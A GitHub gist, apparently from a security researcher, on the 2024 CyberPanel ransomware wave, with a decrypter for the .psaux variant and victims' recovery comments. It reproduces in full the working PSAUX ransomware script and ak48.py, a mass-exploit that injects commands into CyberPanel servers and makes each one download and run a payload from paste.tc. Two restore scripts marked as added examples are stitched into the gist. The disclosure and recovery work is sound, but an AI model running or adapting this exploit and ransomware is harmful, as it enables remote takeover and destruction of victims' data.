@gboddin
Last active October 31, 2024 08:21
cyberpanel 0day leaked attack script

CyberPanel PSAUX attack/defense

This repo contains two things:

  • A decryption script
  • A list of files found on the threat-actor's server

Ransomware status

We are currently aware of 3 separate groups encrypting CyberPanel instances. The extensions they leave are:

  • .psaux
  • .encryp
  • .locked

Decryption

If your server was only hit by PSAUX and your files carry the .psaux extension, you should be able to use the decrypter below. PSAUX encrypts the per-victim AES key and IV with a key pair whose private half is embedded in its own encryption script, so anyone holding that script can recover the key material from /var/key.enc and /var/iv.enc.

#!/bin/bash
######################################################################################
# LeakIX PSAUX CyberPanel Ransom campaign decrypter
#
# You have been blessed by PSAUX
#
# All your files can be decrypted.
#
# Telegram: @psauxsec
#
# Fun must be made on that channel for weak crypto,
#
# Ransomware Rushed by PSAUX
######################################################################################
# WARNING, WE ARE AWARE OF MULTIPLE ENCRYPTION ATTACKS. THIS SCRIPT WORKS WHEN YOUR FILES ARE ENCRYPTED WITH .psaux EXTENSION
# WARNING, ALWAYS WORK ON A COPY OF YOUR DATA, ENCRYPTED OR NOT
# WARNING, THIS SCRIPT WILL RESTORE FILES FROM THE TIME THEY WERE ENCRYPTED, BACKUP ANY CHANGES MADE AFTER THE HACK
### Fail the script if anything's wrong, that's people's data we're dealing with
set -e
echo "Running PSAUX CyberPanel decrypter..."
### Master key gently provided by PSAUX (the private key hard-coded in its own encryption script)
MASTER_KEY="-----BEGIN PRIVATE KEY-----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-----END PRIVATE KEY-----"
MASTER_KEY_PATH="/tmp/private.pem"
echo "$MASTER_KEY" > "$MASTER_KEY_PATH"
# PSAUX leaves the RSA-encrypted AES key and IV in /var; decrypt both with the master key
openssl pkeyutl -decrypt -inkey "$MASTER_KEY_PATH" -in /var/key.enc -out /tmp/key.bin
openssl pkeyutl -decrypt -inkey "$MASTER_KEY_PATH" -in /var/iv.enc -out /tmp/iv.bin
local_key=$(xxd -p /tmp/key.bin)
local_iv=$(xxd -p /tmp/iv.bin)
echo "Recovered key: $local_key IV: $local_iv"
# Find all .psaux files and decrypt them. NUL-delimited names and `read -r` so that
# spaces, newlines and backslashes in filenames survive the loop intact.
find / -name "*.psaux" -type f -print0 | while IFS= read -r -d '' file; do
    if openssl enc -aes-128-cbc -d -K "${local_key}" -iv "${local_iv}" -in "${file}" -out "${file%.psaux}"; then
        rm "${file}"
        echo "Restored ${file%.psaux}"
    else
        # Bad padding means the wrong key or a file encrypted by another group: keep the ciphertext
        echo "FAILED to decrypt ${file}, left in place" >&2
    fi
done
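A more cautious restore routine for the PSAUX case, added here as an example and not part of the gist: it recovers the key and IV the same way the decrypter does but checks their lengths, writes plaintext into a separate directory instead of deleting ciphertext, and uses a NUL-delimited `read -r` loop (the backslash issue raised in the comments). The private-key path, the key.enc/iv.enc paths and the source/destination directories are arguments; `openssl` must be on PATH.

```shell
#!/bin/bash
# Added example (not part of the gist): recover the PSAUX key material and
# restore into a SEPARATE directory, leaving every .psaux file untouched.
# Assumed inputs: the leaked private key PEM, the /var/key.enc and /var/iv.enc
# that PSAUX leaves behind, and a tree of *.psaux files (all passed as arguments).
set -euo pipefail

# Print "<key hex> <iv hex>" recovered from key.enc/iv.enc with the private key.
# Same openssl steps as the gist's decrypter, but the lengths are checked:
# PSAUX used `openssl rand -hex 16`, so both values must be 16 bytes (32 hex).
# $1 private key PEM, $2 key.enc, $3 iv.enc
psaux_recover_key() {
    local priv="$1" k v
    k=$(openssl pkeyutl -decrypt -inkey "$priv" -in "$2" | od -An -tx1 | tr -d ' \n')
    v=$(openssl pkeyutl -decrypt -inkey "$priv" -in "$3" | od -An -tx1 | tr -d ' \n')
    if [ ${#k} -ne 32 ] || [ ${#v} -ne 32 ]; then
        echo "unexpected key/IV length (key=${#k} iv=${#v} hex chars): wrong private key or not PSAUX?" >&2
        return 1
    fi
    echo "$k $v"
}

# Decrypt every *.psaux below $3 into $4 (tree mirrored, .psaux suffix dropped).
# Originals are never deleted; a failed decrypt (bad padding = wrong key or a
# file encrypted by another group) is reported and its partial output removed.
# Returns 1 if any file failed, so the operator can inspect before cleaning up.
# $1 key hex, $2 iv hex, $3 source dir, $4 destination dir
psaux_restore_tree() {
    local key="$1" iv="$2" src="$3" dst="$4"
    # -print0 / read -r -d '': NUL-delimited, so spaces, newlines and backslashes
    # in names survive (a plain `read` mangles backslashes).
    find "$src" -type f -name '*.psaux' -print0 | {
        failed=0
        while IFS= read -r -d '' f; do
            rel="${f#"$src"/}"
            out="$dst/${rel%.psaux}"
            mkdir -p "$(dirname "$out")"
            if openssl enc -aes-128-cbc -d -K "$key" -iv "$iv" -in "$f" -out "$out" 2>/dev/null; then
                echo "restored: $out"
            else
                echo "FAILED: $f (wrong key, or not PSAUX ciphertext)" >&2
                rm -f "$out"
                failed=1
            fi
        done
        exit "$failed"   # subshell exit -> pipeline status -> function status
    }
}

# Usage (paths are placeholders):
#   read -r KEY IV < <(psaux_recover_key /path/to/psaux_private.pem /var/key.enc /var/iv.enc)
#   psaux_restore_tree "$KEY" "$IV" /mnt/victim_copy /mnt/restored
```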
#!/usr/bin/env bash
# PSAUX encryption script as recovered from the threat actor's server. Reproduced for
# analysis; only indentation and comments were added.
private="-----BEGIN PRIVATE KEY-----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-----END PRIVATE KEY-----"
echo "$private" > /var/private.pem
key_name="s2zp8fks9a0L"
echo "Encryption ID: ${key_name}"
PRIVATE_KEY_PATH="/var/private.pem"
if [ ! -f "$PRIVATE_KEY_PATH" ]; then
    echo "Private key not found at $PRIVATE_KEY_PATH"
    exit 1
fi
PRIVATE_KEY=$(cat $PRIVATE_KEY_PATH)
if [ -z "$PRIVATE_KEY" ]; then
    echo "Could not read the private key (maybe permission issue?)"
    exit 1
fi
echo "Private Key SSL: $(echo "$PRIVATE_KEY" | head -n 1)..."
# Ransom note, dropped into /etc/motd
login_message="
######################################################################################
# Encryptions ID : ${key_name} #
# You have been hacked by PSAUX #
# #
# All your files have been encrypted. #
# #
# To restore access, you can contact us in Telegram #
# #
# Telegram: @psauxsec #
# #
# Payment must be made in cryptocurrency. #
# #
# The price for decryption is 200 dollars. #
# Sample decryption can be served upon request. #
# #
# After payment, you will receive a key to run the decrypter script #
# on your system to restore your files. #
# All your database is downloaded and if you are not going to pay in next 3 days #
# its going to be published in darknet. Best Regards! #
# #
# #
# #
# Ransomware Made by PSAUX #
# #
######################################################################################
"
echo "$login_message" > /etc/motd
# Per-victim AES-128-CBC key and IV
key=$(openssl rand -hex 16)
iv=$(openssl rand -hex 16)
echo "Generated key: ${key}"
echo "Generated IV: ${iv}"
# The implementation flaw: key and IV are RSA-encrypted with the key pair whose private
# half is hard-coded above, so anyone holding this script can decrypt /var/key.enc and
# /var/iv.enc. This is what the decrypter relies on.
echo -n $key | xxd -r -p | openssl pkeyutl -encrypt -inkey $PRIVATE_KEY_PATH -out /var/key.enc
if [ $? -eq 0 ]; then
    echo "Key encrypted successfully: /var/key.enc"
else
    echo "Error with key encryption"
    exit 1
fi
echo -n $iv | xxd -r -p | openssl pkeyutl -encrypt -inkey $PRIVATE_KEY_PATH -out /var/iv.enc
if [ $? -eq 0 ]; then
    echo "IV encrypted successfully: /var/iv.enc"
else
    echo "Error with IV encryption"
    exit 1
fi
# Directories left alone (note that /var/lib/mysql is not in this list)
excluded_dirs=(
    "/proc"
    "/sys"
    "/dev"
    "/run"
    "/etc"
    "/usr"
    "/tmp"
    "/var/run"
    "/var/lock"
    "/var/tmp"
    "/mnt"
    "/sbin"
    "/lib64"
    "/bin"
    "/boot"
    "/lib"
    "/lib32"
    "/srv"
    "/libx32"
    "/media"
    "/lost+found"
)
excluded_files=(
    "/var/key.enc"
    "/var/iv.enc"
    "/var/decrypter.sh"
    "/var/index_template.html"
)
is_excluded() {
    local path=$1
    for excluded in "${excluded_dirs[@]}"; do
        if [[ "$path" == "$excluded"* ]]; then
            return 0
        fi
    done
    for excluded in "${excluded_files[@]}"; do
        if [[ "$path" == "$excluded" ]]; then
            return 0
        fi
    done
    return 1
}
encrypt_directory() {
    local dir=$1
    echo "Encrypting directory: $dir"
    find "$dir" -type f -print0 | while IFS= read -r -d '' file; do
        if ! is_excluded "$file"; then
            echo "Encrypting file: $file"
            openssl enc -aes-128-cbc -K "$key" -iv "$iv" -in "$file" -out "${file}.psaux"
            if [ $? -eq 0 ]; then
                echo "[+] : ${file}.psaux"
                rm -f "$file"
            else
                echo "Error encrypting: $file"
            fi
        else
            echo "Excluded file: $file"
        fi
    done
}
encrypt_directory "/"
# Drop the ransom page into every remaining directory
find / -type d \( -path /proc -o -path /sys -o -path /dev -o -path /run -o -path /tmp -o -path /var/run -o -path /var/lock -o -path /var/tmp -o -path /mnt -o -path /media -o -path /lost+found \) -prune -o -type d -print0 | while IFS= read -r -d '' dir; do
    if ! is_excluded "$dir"; then
        cp /var/index_template.html "$dir/index.html"
    fi
done
# Second pass over anything still unencrypted
find / -type f \( -path /proc -o -path /sys -o -path /dev -o -path /run -o -path /tmp -o -path /var/run -o -path /var/lock -o -path /var/tmp -o -path /mnt -o -path /media -o -path /lost+found -o -name "*.psaux" -o -name "index.html" -o -name "decrypter.sh" \) -prune -o -type f -print0 | while IFS= read -r -d '' file; do
    if ! is_excluded "$file"; then
        echo "[+] : $file"
        openssl enc -aes-128-cbc -K "$key" -iv "$iv" -in "$file" -out "${file}.psaux"
        if [ $? -eq 0 ]; then
            echo "[+] : ${file}.psaux"
            rm -f "$file"
        else
            echo "Error encrypting: $file"
        fi
    else
        echo "Excluded file: $file"
    fi
done
rm -- "$0" && exit 0
# ak48.py: the leaked attack script as found on the threat actor's server, with only
# indentation restored.
import httpx
import sys
import time
from concurrent.futures import ThreadPoolExecutor, as_completed


def get_CSRF_token(client):
    try:
        resp = client.get("/")
        if resp.status_code == 200:
            return resp.cookies.get('csrftoken')
        else:
            print(f"Failed to connect to {client.base_url}. Status code: {resp.status_code}")
            return None
    except httpx.RequestError:
        print(f"Failed to connect to {client.base_url}")
        return None


def pwn(client, CSRF_token, cmd):
    if not CSRF_token:
        return "No CSRF token"
    headers = {
        "X-CSRFToken": CSRF_token,
        "Content-Type": "application/json",
        "Referer": str(client.base_url)
    }
    payload = '{"statusfile":"/dev/null; %s; #","csrftoken":"%s"}' % (cmd, CSRF_token)
    try:
        response = client.put("/dataBases/upgrademysqlstatus", headers=headers, data=payload)
        if response.headers.get("Content-Type", "").startswith("application/json"):
            return response.json().get("requestStatus", "No response")
        else:
            print(f"Unexpected response type from {client.base_url}: {response.text}")
            return "Unexpected response"
    except httpx.RequestError:
        return "Failed to execute"


def execute_command(client, command):
    CSRF_token = get_CSRF_token(client)
    if not CSRF_token:
        print(f"Could not retrieve CSRF token from {client.base_url}")
        return "Failed to retrieve CSRF token"
    print(f"Executing: {command} on {client.base_url}")
    stdout = pwn(client, CSRF_token, command)
    print(stdout)
    return stdout


def process_target(target):
    print(f"Processing target: {target}")
    try:
        client = httpx.Client(base_url=target, verify=False, timeout=5.0)
        # Step 1: Download the file
        if "Failed" in execute_command(client, "curl -L https://www.paste.tc/raw/asd-41506 -o /var/actually.sh"):
            return
        # Step 2: Check if the file exists, retry if necessary
        file_exists = False
        while not file_exists:
            response = execute_command(client, "ls /var/actually.sh")
            if "No such file or directory" not in response:
                file_exists = True
                print("File found. Proceeding with further steps...")
            else:
                print("File not found. Waiting for the download to complete...")
                time.sleep(2)  # Wait for 2 seconds before checking again
        # Step 3: Change permissions for the downloaded file
        execute_command(client, "chmod +x /var/actually.sh")
        # Step 4: Remove any carriage return issues
        execute_command(client, "sed -i 's/\r//g' /var/actually.sh")
        # Step 5: Execute the script with nohup to detach and log to /dev/null
        execute_command(client, "nohup /var/actually.sh")
        print("Script executed and detached.")
    except httpx.RequestError as e:
        print(f"Could not connect to {target}. Error: {str(e)}")


def main(targets_file, max_threads=5):
    try:
        with open(targets_file, "r") as file:
            targets = [line.strip() for line in file if line.strip()]
        with ThreadPoolExecutor(max_threads) as executor:
            future_to_target = {executor.submit(process_target, target): target for target in targets}
            for future in as_completed(future_to_target):
                target = future_to_target[future]
                try:
                    future.result()
                except Exception as exc:
                    print(f"{target} generated an exception: {exc}")
    except FileNotFoundError:
        print(f"Error: File {targets_file} not found.")
        sys.exit(1)


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python3 ak48.py targets.txt [max_threads]")
        sys.exit(1)
    targets_file = sys.argv[1]
    max_threads = int(sys.argv[2]) if len(sys.argv) > 2 else 5
    main(targets_file, max_threads)
Oct 29 12:01:15 ready sshd[2293619]: Accepted password for root from 188.119.27.24 port 31771 ssh2
Oct 29 12:35:48 ready sshd[2294265]: Accepted password for root from 188.119.27.24 port 30923 ssh2
Oct 29 13:25:23 ready sshd[2294914]: Accepted password for root from 188.119.27.24 port 31508 ssh2
Oct 29 14:04:22 ready sshd[2295536]: Accepted password for root from 188.119.27.24 port 31502 ssh2
Oct 29 14:15:47 ready sshd[2296023]: Accepted password for root from 188.119.27.24 port 31334 ssh2
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAsrBV2UGqNIQ8iL3j3/yh+qi7Q76plJteqTmS2EdQ4A8HR6yckuRnyr5s0UVDI/eiAZpiNKDDpipwULl22Sih96vFOJkKpON5bxQ4NwUFQ7Fq7wheBK9PBQ5owuBrOqIeY3D846kNejNJhDOcIiDYN9KqCeP+EGlKTFb68/nifQkPychx+z4MEm39pB7CKS+EFXsOoCmBntb7wduZf0spLtstd+bTSFxwbdgSNQU2iabazLYG05LQWTc4+Zv574Wt4608PjGE2uyofxO69XFtiYy9LvNtzmLOlJYy89M3HdQgfGzrWVC8QLLsZvuQsrRPDFb4/2/KJ5KyT9rg7qGeQQ== Suphachai
@gboddin
Author

gboddin commented Oct 30, 2024

Then feel free to zip to support@leakix.net

@DZORAJAN1996

Please, if you know how to unlock .locked files, write.

@amjeed-ay

amjeed-ay commented Oct 30, 2024

For those using a MySQL database: I found that the database table files (.ibd) are not affected. You may be able to recover your database from those files.

/var/lib/mysql

@user202856

The read loop in 0-decrypt.sh treats any backslashes in the filenames fed into it as escape characters.
It needs to be read -r there.
@gboddin Thank you for this gist!

@Orgoth

Orgoth commented Oct 30, 2024

@gboddin

Then feel free to zip to support@leakix.net

also not possible

support@leakix.net: host mail.protonmail.ch[185.205.70.128] said: 554 5.7.1
We do not accept viral traffic (in reply to end of DATA command)

@gboddin
Author

gboddin commented Oct 30, 2024

@gboddin

Then feel free to zip to support@leakix.net

also not possible

support@leakix.net: host mail.protonmail.ch[185.205.70.128] said: 554 5.7.1 We do not accept viral traffic (in reply to end of DATA command)

Just password protect the zip with infected

@gboddin
Author

gboddin commented Oct 30, 2024

Please, if you know how to unlock .locked files, write.

That looks unlikely. Only .psaux made an encryption mistake.

  • One of the groups (.locked) properly used asymmetric encryption to ensure recovery is impossible
  • The other group (.encryp) seems to use a binary that is still under analysis, but it seems they do asymmetric encryption as well and recompile the binary for each target

@gboddin
Author

gboddin commented Oct 30, 2024

The read loop in 0-decrypt.sh treats any backslashes in the filenames fed into it as escape characters. It needs to be read -r there. @gboddin Thank you for this gist!

No pb.

I forgot to quote the filenames at line 75. Should work now!

@Orgoth

Orgoth commented Oct 30, 2024

Please, if you know how to unlock .locked files, write.

That looks unlikely. Only .psaux made an encryption mistake.

  • One of the groups (.locked) properly used asymmetric encryption to ensure recovery is impossible
  • The other group (.encryp) seems to use a binary that is still under analysis, but it seems they do asymmetric encryption as well and recompile the binary for each target

Ok thank you for your time and work, then it is not possible to recover.
It was only a test-/dev-Server in my case.
For everyone else, I feel sorry.

@KevinErasmus1999

Has anyone had success in restoring the files?

@amjeed-ay

Has anyone had success in restoring the files?

I successfully recovered my MySQL database from the .ibd files, which were not encrypted by the attack.

@Orgoth

Orgoth commented Oct 30, 2024

Has anyone had success in restoring the files?

I successfully recovered my MySQL database from the .ibd files, which were not encrypted by the attack.

@amjeed-ay
How did you recover the database?
I have checked mine and only the frm files are missing.

@amjeed-ay

amjeed-ay commented Oct 30, 2024

@Orgoth

Stop MySQL and replace the new empty .ibd file with your old .ibd file (backup the original).
Run the ALTER TABLE <table_name> DISCARD TABLESPACE followed by ALTER TABLE <table_name> IMPORT TABLESPACE commands to link the file back to the database.

@Orgoth

Orgoth commented Oct 30, 2024

@amjeed-ay For me it will not work.

ERROR 1030 (HY000): Got error 194 "Tablespace is missing for a table" from storage engine InnoDB

I suspect it is a problem with MariaDB.

@digitalserv

@Orgoth

You can try creating a new temporary database for recovery and then creating all tables based on the schema of the original tables. After that, you can "replace" the .ibd files one at a time (if you have foreign keys, you should do it in the right order ~ parent first). The steps you should do for every table you need to recover:

  1. Run ALTER TABLE your_table DISCARD TABLESPACE;
  2. Copy the IBD file into your_table's folder (after the 1st step the default IBD file should disappear)
  3. Run ALTER TABLE your_table IMPORT TABLESPACE;

When you finish, you can export/import to your main database.

@amjeed-ay

@amjeed-ay For me it will not work.

ERROR 1030 (HY000): Got error 194 "Tablespace is missing for a table" from storage engine InnoDB

I suspect it is a problem with MariaDB.

Here's a refined guide to share with your community about recovering a MySQL database from .ibd files post-attack:


I was able to recover my database using these steps:

  1. Match MySQL Versions: Ensure the same MySQL version as the original.
  2. Retrieve Database Backup: Get a database copy, even from old backups.
  3. Replace .ibd Files: Swap existing .ibd files with the ones from the infected server.
  4. Drop Table Indexes and Foreign Keys.
  5. Run Tablespace Commands:
    • ALTER TABLE your_table DISCARD TABLESPACE;
    • ALTER TABLE your_table IMPORT TABLESPACE;
  6. Handle Errors: If errors occur, replace .ibd files and try again.

I was fortunate the attack didn’t encrypt .ibd files. This incident reinforced the importance of strong security measures and maintaining redundant backups. Stay prepared!
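The DISCARD/IMPORT sequence described in this thread, scripted as an added example (not code from any commenter): it refuses .ibd files that are themselves encrypted, checks that the placeholder tablespace was really detached before copying the surviving file in, and processes tables in the order given. `MYSQL_CMD`, the datadir layout and the source directory are assumptions; the schema must already have been recreated on a server of the same MySQL/MariaDB version.

```shell
#!/bin/bash
# Added example, not from the thread: re-attach a surviving InnoDB .ibd to a
# freshly created empty table, in the order the thread describes
# (DISCARD TABLESPACE -> copy the file in -> IMPORT TABLESPACE).
# Assumptions: the table definitions were already recreated on a server of the
# same MySQL/MariaDB version, the copied .ibd files sit in a directory of your
# choosing, and MYSQL_CMD points at a mysql client that carries its credentials.
set -euo pipefail
MYSQL_CMD="${MYSQL_CMD:-mysql}"

# $1 database, $2 table, $3 surviving .ibd copied off the infected server,
# $4 datadir of the rebuilt server (usually /var/lib/mysql)
ibd_reattach_table() {
    local db="$1" tbl="$2" src="$3" datadir="$4"
    local dest="$datadir/$db/$tbl.ibd"
    case "$src" in
        *.locked|*.psaux|*.encryp)
            echo "skip $src: the .ibd itself is encrypted, nothing to import" >&2; return 2 ;;
    esac
    [ -s "$src" ] || { echo "skip $src: missing or empty" >&2; return 2; }
    [ -d "$datadir/$db" ] || { echo "no $datadir/$db: recreate the schema first" >&2; return 1; }
    # 1. detach the empty placeholder tablespace created with the new table
    "$MYSQL_CMD" "$db" -e "ALTER TABLE \`$tbl\` DISCARD TABLESPACE;"
    # 2. after DISCARD the placeholder .ibd must be gone; only then copy ours in
    #    (when run as root, chown the copy to the mysql user afterwards)
    [ ! -e "$dest" ] || { echo "$dest still present after DISCARD, aborting" >&2; return 1; }
    cp -p "$src" "$dest"
    # 3. link the file back; on failure the file stays in place for inspection
    "$MYSQL_CMD" "$db" -e "ALTER TABLE \`$tbl\` IMPORT TABLESPACE;"
    echo "re-attached $db.$tbl from $src"
}

# $1 database, $2 datadir, $3 directory holding the copied <table>.ibd files,
# remaining args: table names in dependency order (parents before children).
# Returns the number of tables that could not be re-attached.
ibd_reattach_all() {
    local db="$1" datadir="$2" srcdir="$3" failed=0 tbl
    shift 3
    for tbl in "$@"; do
        if ! ibd_reattach_table "$db" "$tbl" "$srcdir/$tbl.ibd" "$datadir"; then
            failed=$((failed + 1))
        fi
    done
    return "$failed"
}
```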

@akwasi-dehaan

@amjeed-ay For me it will not work.
ERROR 1030 (HY000): Got error 194 "Tablespace is missing for a table" from storage engine InnoDB
I suspect it is a problem with MariaDB.

Here's a refined guide to share with your community about recovering a MySQL database from .ibd files post-attack:

I was able to recover my database using these steps:

  1. Match MySQL Versions: Ensure the same MySQL version as the original.

  2. Retrieve Database Backup: Get a database copy, even from old backups.

  3. Replace .ibd Files: Swap existing .ibd files with the ones from the infected server.

  4. Drop Table Indexes and Foreign Keys.

  5. Run Tablespace Commands:

    • ALTER TABLE your_table DISCARD TABLESPACE;
    • ALTER TABLE your_table IMPORT TABLESPACE;
  6. Handle Errors: If errors occur, replace .ibd files and try again.

I was fortunate the attack didn’t encrypt .ibd files. This incident reinforced the importance of strong security measures and maintaining redundant backups. Stay prepared!

Does this mean that if my .ibd files were encrypted to .ibd.locked, I can't retrieve my data?

@zapsjava

Yes, if your file is .ibd.locked then this will not work.
If your system was encrypted with the extension .encryp then your .ibd files most likely were left unencrypted and you have a chance to recover the database.

@Orgoth

Orgoth commented Oct 30, 2024

@amjeed-ay Thank you very much for your time and the refined guide.

I had created a new database within the rescue console.

  1. Same Mariadb version.
  2. Sadly no older db is available, since it was a test and dev system without external backups
    2.1. Someone decided to put a project on this server which was in use -_- I am trying to save at least 2 - 3 tables, all other projects are already up and running since they are only tests and dev without any important data

I will test again on Friday, at the moment I am completely burned out.

Yes, if your file is .ibd.locked then this will not work.
If your system was encrypted with the extension .encryp then your .ibd files most likely were left unencrypted and you have a chance to recover the database.

Only the frm were encrypted.

@AhmadOsamaSaad

AhmadOsamaSaad commented Oct 30, 2024

All my files are encrypted with [.locked format].
What is the correct way to decrypt these files and codes above?

@LinuxCuba

@Orgoth @adnanebrahimi

This script was made for the variant that renames files to .psaux .

This is interesting, we don't know if there are multiple groups competing or if they changed their script.

In any case we're interested to get the content of the ransom note, any keys that was left ( in tmp or other ) and a sample encrypted file.

Contact us at support@leakix.net

They have not tried without the same /var/key.enc and /var/iv.enc files as before, they are used with the key to unlock the files that are only .locked.

@LinuxCuba

All my files are encrypted with [.locked format]. What is the correct way to decrypt these files and codes above?

At the moment if you don't have the files /var/key.enc and /var/iv.enc, nothing can be done.

@LinuxCuba

@amjeed-ay For me it will not work.
ERROR 1030 (HY000): Got error 194 "Tablespace is missing for a table" from storage engine InnoDB
I suspect it is a problem with MariaDB.

Here's a refined guide to share with your community about recovering a MySQL database from .ibd files post-attack:
I was able to recover my database using these steps:

  1. Match MySQL Versions: Ensure the same MySQL version as the original.

  2. Retrieve Database Backup: Get a database copy, even from old backups.

  3. Replace .ibd Files: Swap existing .ibd files with the ones from the infected server.

  4. Drop Table Indexes and Foreign Keys.

  5. Run Tablespace Commands:

    • ALTER TABLE your_table DISCARD TABLESPACE;
    • ALTER TABLE your_table IMPORT TABLESPACE;
  6. Handle Errors: If errors occur, replace .ibd files and try again.

I was fortunate the attack didn’t encrypt .ibd files. This incident reinforced the importance of strong security measures and maintaining redundant backups. Stay prepared!

Does this mean that if my .ibd files were encrypted to .ibd.locked, I can't retrieve my data?

exact

@LinuxCuba

Has anyone had success in restoring the files?

I successfully recovered my MySQL database from the .ibd files, which were not encrypted by the attack.

Me too. The databases in /var/lib/mysql were not affected. On the attacked server, copy this directory to a safe place after mounting the affected virtual machine's disk. Then restore from the backup: I didn't start the VM, I mounted the hard drive and copied /var/lib/mysql from the old disk to the new VM's disk. Then I started the server and upgraded CyberPanel, and everything worked again.

This is in case your databases were not affected by this ransomware.

@LinuxCuba

Hence the importance of having daily backups of everything in another remote location.

Best regards.

@kilian099

Hi I have been hacked with .locked encrypt files, I really screwed up with this messy ransomware. Is there any way to fix this?

@exzept

exzept commented Oct 31, 2024

[.locked format] what's the right thing to do?

@Akrobs

Akrobs commented Oct 31, 2024

[.locked format] what's the right thing to do?

It's C3RB3R Conti v3-based Ransomware

No decryptors (((

@exzept

exzept commented Oct 31, 2024

I mean reinstall the entire system?

@Akrobs

Akrobs commented Oct 31, 2024

I mean reinstall the entire system?

I think yep... There are no other options.
